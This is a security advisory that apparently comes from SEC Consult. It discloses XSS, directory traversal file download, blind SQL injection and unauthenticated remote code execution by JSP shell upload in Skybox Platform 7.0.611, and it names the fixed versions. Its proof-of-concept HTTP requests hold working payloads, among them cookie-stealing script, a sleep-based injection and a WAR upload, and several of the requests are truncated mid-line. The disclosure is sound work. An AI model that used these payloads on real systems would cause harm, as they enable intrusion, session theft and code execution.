SEC Consult Vulnerability Lab Security Advisory < 20151210-0 >
==============================
title: Multiple Vulnerabilities
product: Skybox Platform
vulnerable version: <=7.0.611
fixed version: 7.5.401
CVE number:
impact: Critical
homepage: www.skyboxsecurity.com/
found: 2014-12-04
by: K. Gudinavicius, M. Heinzl, C. Schwarz (Office Singapore)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
==============================
Vendor description:
- -------------------
"Skybox Security provides cutting-edge risk analytics for enterprise security
management. Our solutions give you complete network visibility, help you
eliminate attack vectors, and optimize your security management processes.
Protect the network and the business."
Source: http://www.skyboxsecurity.com/
Business recommendation:
- ------------------------
Attackers are able to perform Cross-Site Scripting and SQL Injection attacks
against the Skybox platform. Furthermore, it is possible for
unauthenticated attackers to download arbitrary files and execute arbitrary
code.
SEC Consult recommends the vendor to conduct a comprehensive security
analysis, based on security source code reviews, in order to identify all
available vulnerabilities in the Skybox platform and increase the security
of its customers.
Vulnerability overview/description:
- ------------------------------
1) Multiple Reflected Cross-Site Scripting Vulnerabilities
2) Multiple Stored Cross-Site Scripting Vulnerabilities
3) Arbitrary File Download and Directory Traversal Vulnerability
4) Blind SQL Injection Vulnerability
5) Remote Unauthenticated Code Execution
Proof of concept:
- -----------------
1) Multiple Reflected Cross-Site Scripting Vulnerabilities
Multiple scripts are prone to reflected Cross-Site Scripting attacks.
The following example demonstrates this issue with the
service VersionRepositoryWebService:
POST /skyboxview/webservice/
Content-type: text/plain
User-Agent: Axis/1.4
Host: localhost:8282
SOAPAction: ""
Content-Length: 863
<?xml version="1.0" encoding="UTF-8"?><soapenv:
xmlns:soapenv="http://schemas.
xmlns:xsd="http://www.w3.org/
xmlns:xsi="http://www.w3.org/
ersion
soapenv:encodingStyle="http://
xmlns:ns1="http://com/skybox/
t;a
xmlns:a='http://www.w3.
onload='alert(1)'/&
soapenc:arrayType="soapenc:
xmlns:soapenc="http://schemas.
xsi:type="soapenc:string">
xsi:type="soapenc:string"
xmlns:soapenc="http://schemas.
ntVersion
xsi:type="soapenc:string"
xmlns:soapenc="http://schemas.
on></ns1:checkVersion></
Other scripts and parameters, such as the parameter status of the login script
(located at https://localhost:444/login.
following request demonstrates this issue:
https://localhost:444/login.
ument.cookie%29%3C/script%3E
2) Multiple Stored Cross-Site Scripting Vulnerabilities
Multiple fields of the Skybox Change Manager, which can be accessed at
https://localhost:8443/
attacks. For example when creating a new ticket, the title can be misused
to insert JavaScript code. The following request to the server demonstrates
the issue:
Request:
POST /skyboxview/webskybox/tickets HTTP/1.1
Host: localhost:8443
[...]
7|0|18|https://localhost:8443/
wt.client.service.
fer.netmodel.tickets.
.modelview.ChangeRequestGraph/
es.BasePhaseOperation/
netmodel.PhaseDefinitionId/
ew.transfer.properties.
TicketWorkflowId/3953158119|
Id/1448062761|com.skybox.view.
52682809||skyboxview|test"><
src=yy onerror=alert(document.cookie) >|java.util.ArrayList/41
Other fields, like "Comments" and "Description", are affected as well.
3) Arbitrary File Download and Directory Traversal Vulnerability
Skybox Change Manager allows to upload and download attachments for tickets.
The download functionality can be exploited to download arbitrary files. No
authentication is required to exploit this vulnerability. The following
request demonstrates the issue:
POST /skyboxview/webskybox/
Host: localhost:8443
tempShortFileName=aaaaaa&
win.ini
The script /skyboxview/webskybox/
vulnerability.
Note: The upload functionality can also be used to upload files without
authentication.
4) Blind SQL Injection Vulnerability
Arbitrary SQL queries can be inserted into the service VersionWebService. The
following request demonstrates this issue with a simple sleep statement:
POST https://localhost:8443/
HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 619
Host: localhost:8443
Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
<soapenv:Envelope xmlns:xsi="http://www.w3.org/
xmlns:xsd="http://www.w3.org/
xmlns:soapenv="http://schemas.
xmlns:ver="http://com/skybox/
<soapenv:Header/>
<soapenv:Body>
<ver:getUserLockInSeconds
soapenv:encodingStyle="http://
<username xsi:type="soapenc:string"
xmlns:soapenc="http://schemas.
* from (select(sleep(20)))a)+'</
</ver:getUserLockInSeconds>
</soapenv:Body>
</soapenv:Envelope>
No authentication is required to exploit this vulnerability.
5) Remote Unauthenticated Code Execution
It is possible to upload WAR files, containing for example JSP files, which
will be automatically deployed by the Skybox appliance. This way, it is
possible to upload a JSP shell which enables an attacker to execute arbitrary
commands running in the same context as the web server running (by default
skyboxview).
The following request to the Skyboxview update service (located at
https://localhost:9443) uploads a JSP file. It will be uploaded to
/opt/skyboxview/thirdparty/
extracted and deployed at
/opt/skyboxview/thirdparty/
POST /skyboxview-softwareupdate/
Accept-Encoding: gzip,deflate
SOAPAction: ""
Content-Type: multipart/related; type="text/xml";
start="<rootpart@soapui.org>";
boundary="----=_Part_1_
MIME-Version: 1.0
User-Agent: Jakarta Commons-HttpClient/3.1
Host: localhost:9443
Content-Length: 1944
- ------=_Part_1_1636307031.
Content-Type: text/xml; charset=UTF-8
Content-Transfer-Encoding: 8bit
Content-ID: <rootpart@soapui.org>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/
xmlns:xsd="http://www.w3.org/
xmlns:soapenv="http://schemas.
xmlns:sof="http://com/skybox/
<soapenv:Header/>
<soapenv:Body>
<sof:uploadPatch
soapenv:encodingStyle="http://
<patchName xsi:type="soapenc:string"
xmlns:soapenc="http://schemas.
s/server/web/deploy/
<patchData href="cid:helloworld.war"/>
</sof:uploadPatch>
</soapenv:Body>
</soapenv:Envelope>
- ------=_Part_1_1636307031.
Content-Type: application/octet-stream; name=helloworld.war
Content-Transfer-Encoding: binary
Content-ID: <helloworld.war>
Content-Disposition: attachment; name="helloworld.war"; filename="helloworld.wa
r"
[binary]
Vulnerable / tested versions:
- -----------------------------
The vulnerabilities have been verified to exist in the Skybox platform
version 7.0.611, which was the most recent version at the time of discovery.
Vendor contact timeline:
- ------------------------
Communication with the vendor was handled by SEC Consult's client.
Solution:
- ---------
According to the release-notes, the issues have been fixed in the following
versions (reference number "19184"):
7.5.401: Reflected Cross-site scripting vulnerabilities
7.5.201: Remote Code Execution, SQL Injection, Arbitrary File Download and
Directory Traversal
Users of Skybox are advised to upgrade to version 7.5.401 or higher.
Workaround:
- -----------
None
Advisory URL:
- -------------
https://www.sec-consult.com/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_
EOF M. Heinzl/ @2015
Komentarų nėra:
Rašyti komentarą